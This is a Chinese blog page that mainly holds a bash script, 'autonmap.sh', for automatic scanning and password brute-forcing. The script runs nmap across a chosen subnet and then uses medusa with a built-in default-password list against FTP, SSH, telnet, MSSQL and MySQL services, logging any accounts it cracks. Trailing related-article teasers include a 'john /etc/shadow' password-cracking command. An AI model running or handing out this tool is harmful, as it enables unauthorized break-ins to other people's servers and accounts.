自动扫描和暴力破解

#!/bin/bash
#autonmap.sh :
#Author: Qingzheng
#platform: backtrack5 r3

function Usage(){
    echo "########################################"
    echo "#Auto scan and attack                  #"
    echo "#autonmap.sh                           #"
    echo "#Author: Qingzheng                     #"
    echo "########################################"
    echo -e "${red}Example:"
    echo -e "Rhost:>> 192.168.0.0/24"
    echo -e "Rport:>> 21 (21/22/23/1433/3306)$white"
    echo
  }

function DictCreate(){
    if [ ! -d $(pwd)/tmp ]; then
        mkdir $(pwd)/tmp
        if [ ! -e $(pwd)/tmp/user.dict ]; then echo -en "root\n" >$(pwd)/tmp/user.dict; fi
        if [ ! -e $(pwd)/tmp/passwd.dict ]; then
            echo -en "admin\nadministrator\nadministrators\nroot\nmysql\nadmin123\nadmini123\ntoor\ntoor123\nmysql\nmysql123\n123456\n12345678\n" >$(pwd)/tmp/passwd.dict
        fi

    fi
  }

function Checknmapmedusa(){
if [ ! -e /usr/local/bin/nmap ]; then echo -e "[$blue>$white] Start install nmap";apt-get install -y nmap | sed ‘s/^/[nmap]/g‘; fi
if [ ! -e /usr/local/bin/medusa ]; then echo -e "[$blue>$white] Start install medusa";apt-get install -y medusa | sed ‘s/^/[medusa]/g‘; fi
  }

function ScanAttack(){
    echo -e "[$blue>$white] Starting scan..."
    xterm -geometry 80x20+80+0 -e "nmap -v -sS -sV -oG $(pwd)/tmp/scan-$Rport -p $Rport $Rhost"

    grep "$Rport/open/tcp//$Rserver//" $(pwd)/tmp/scan-$Rport | cut -d‘ ‘ -f2 >$(pwd)/tmp/scan-analyze-$Rport && rm -rf $(pwd)/tmp/scan-$Rport
    sed "s/^/ >  /g" $(pwd)/tmp/scan-analyze-$Rport

    if [ -s $(pwd)/tmp/scan-analyze-$Rport ]; then
        echo -e "[$blue>$white] Straring try crack..."
        xterm -geometry 80x20+80+640 -e medusa -U $(pwd)/tmp/user.dict -P $(pwd)/tmp/passwd.dict -e ns -v 10 -H $(pwd)/tmp/scan-analyze-$Rport -M $Rserver -O $(pwd)/tmp/output-$Rport

        if [ -s $(pwd)/tmp/output-$Rport ]; then
            grep "ACCOUNT FOUND: " $(pwd)/tmp/output-$Rport | awk ‘{print $3,$4,$5,$6,$7,$8,$9}‘ | sed "s/$Rserver/>/g" | uniq | tee -a $(pwd)/tmp/output-$Rport.lst && rm -rf $(pwd)/tmp/output-$Rport
            echo -e "[$blue>$white] Medusa DONE!!"
        else
            echo -e "[$blue-$white] Not founding passwd!!"
        fi
    else
        echo -e "[$blue>$white] Not founding hosts"
    fi
  }

#####################################################################
#####################################################################

function Main(){
    blue="\e[01;34m"
    red="\e[01;31m"
    white="\e[00m"
    underline="\\033[4m"
    Usage
    DictCreate
    Checknmapmedusa
    while [ True ];do
        echo -en "${underline}Rhost$white:$blue>>$white"
        read Rhost
        echo -en "${underline}Rport$white:$blue>>$white"
        read Rport
        case $Rport in
        "21")
                Rserver=ftp
                ScanAttack
        ;;
        "22")
                Rserver=ssh
                ScanAttack
        ;;
        "23")
                Rserver=telnet
                ScanAttack
        ;;
        "1433")
                Rserver=mssql
                ScanAttack
        ;;
        "3306")
                Rserver=mysql
                ScanAttack
        ;;
        *)
                echo -e "[$blue>$white] Input error! Quit!!"
                break
        ;;
        esac
    done
}

#########################################################
#########################################################

Main

时间: 2024-10-08 21:26:28

自动扫描和暴力破解的相关文章

防止ssh暴力破解linux密码

网上看到一篇安全方面的文章,常用的网站收藏无法收藏,于是放这里先.具体功能还未测试,请慎用. 下面是博客原文转载,感谢作者辛苦劳动: 服务器在互联网中,每天都有些没事儿干的人在你的机器端口扫来扫去,让管理员非常烦恼.本文描述一个方法,利用本文介绍的脚本结合iptables服务一并使用,用来防止公网计算机通过ssh进行用户口令暴力破解.目前稳重脚本已经在其他项目的实际运营环境中得到验证. 脚本内容: #!/bin/bash # 防SSH密码暴力破解脚本 # 通过分析secure日志文件使用ipta

shadow文件弱口令暴力破解——John

在渗透测试中,这里主要说的是linux系统,我们经常遇到任意文件下载或读取,以及命令执行等,但是命令执行有些时候并没有交互式的,我们想添加账号和密码就会很困难,所以这时我们就可以读取shadow文件,将内容保存到本地,然后使用john来进行破解,从而可使用系统中的账号进行远程连接控制! 下载地址:http://www.openwall.com/john/ 基本使用语法: john shadow [email protected]:~# john /etc/shadow Warning: dete

fail2ban防止暴力破解

暴力破解在公网上是很常见的,当我们在公网上的服务器被暴力破解的时候,我们就的采取相应的措施,今天我们来讲一个开源软件fail2ban,以防止暴力破解. 我们去官网下下载稳定版本的fail2ban安装包. fail2ban官网地址:http://www.fail2ban.org 环境,假设192.168.1.63是公网上的服务器,被别人暴力破解时怎么办呢. 题目: 实战背景: 最近公网网站一直被别人暴力破解sshd服务密码.虽然没有成功,但会导致系统负载很高,原因是在暴力破解的时候,系统会不断地认

【运维小分享】记个人博客网站受针对xmlrpc.php的暴力破解攻击

起因: 今天忽然打开个人blog,就发现打开很慢,然后出现了下图的反馈:服务器服务不可用!waht?刷新了几次都不行,赶紧登陆服务器后台查看情况. 确认攻击: 登陆后台后通过netstat发现连接数极多,相对于平时来说多了好几倍吧,赶紧通过日志load出疯狂访问的ip # cat 2016-12-16-access_log | awk '{print $1}' | sort | uniq -c | sort -rn | head -n 10   30305 191.96.249.53   290

利用Python自动生成暴力破解的字典

Python是一款非常强大的语言.用于测试时它非常有效,因此Python越来越受到欢迎. 因此,在此次教程中我将聊一聊如何在Python中生成字典,并将它用于任何你想要的用途. 前提要求 1,Python 2.7(对于Python 3.x的版本基本相同,你只需要做一些微小调整) 2,Peace of mine(作者开的一个玩笑,这是一首歌名) 如果你用virtualenv搭建Python开发环境,请确保已经安装了itertools.因为我们将会用到itertools生成字典.我们将一步一步地演示

Wireshark黑客发现之旅(4)——暴力破解

Wireshark黑客发现之旅(4)——暴力破解 聚锋实验室 · 2015/08/10 10:33 作者:Mr.Right.K0r4dji 申明:文中提到的攻击方式仅为曝光.打击恶意网络攻击行为,切勿模仿,否则后果自负. 一.个人观点 暴力破解,即用暴力穷举的方式大量尝试性地猜破密码.猜破密码一般有3种方式: 1.排列组合式:首先列出密码组合的可能性,如数字.大写字母.小写字母.特殊字符等:按密码长度从1位.2位……逐渐猜试.当然这种方法需要高性能的破解算法和CPU/GPU做支持. 2.字典破解

Centos6.4 安装fail2ban防暴力破解

Centos6.4 安装fail2ban防暴力破解 一. 安装 curl -O https://codeload.github.com/fail2ban/fail2ban/tar.gz/0.9.0 mv 0.9.0 0.9.0.tar.gz tar zxvf 0.9.0.tar.gz cd fail2ban-0.9.0/ python setup.py build python setup.py install 二.配置(防ssh暴力) vi /etc/fail2ban/jail.conf [s

利用Teensy进行EM410x卡模拟以及暴力破解EM410X类门禁系统可行性猜想

前些天Open入手了Teensy++ 2.0,所以在无聊的情况下研究了Teensy++ 2.0模拟EM410X,并且针对EM410X的门禁进行了一次暴力破解测试,以下就是相关代码以及内容. 什么是低频?什么是EM410x? 首先,我不得不再次提一下那些工作在125khz频率下的低频卡(如:EM410X之类的),以便大家更好的阅读以下的内容. 什么是低频?以下就是低频的解释: 低频(LF, Low frequency)是指频带由30KHz到300KHz的无线电电波.一些无线电频率识别( RFID技

【初学破解】暴力破解绕过程序认证

最近在学习的时候有缘认识到了破解 为了能够略懂~花了点时间在这个上面做了点简单的破解实验~~ 下面将会介绍在破解程序中非常简单的一种破解方法----暴力破解~~~ 正文: ①编写漏洞程序 首先用c语言写了一个小bug程序 代码如下: #include <stdio.h> #include <windows.h> int main(){ int s=0; scanf("%d",&s); if(s == 8){ printf("注册成功!"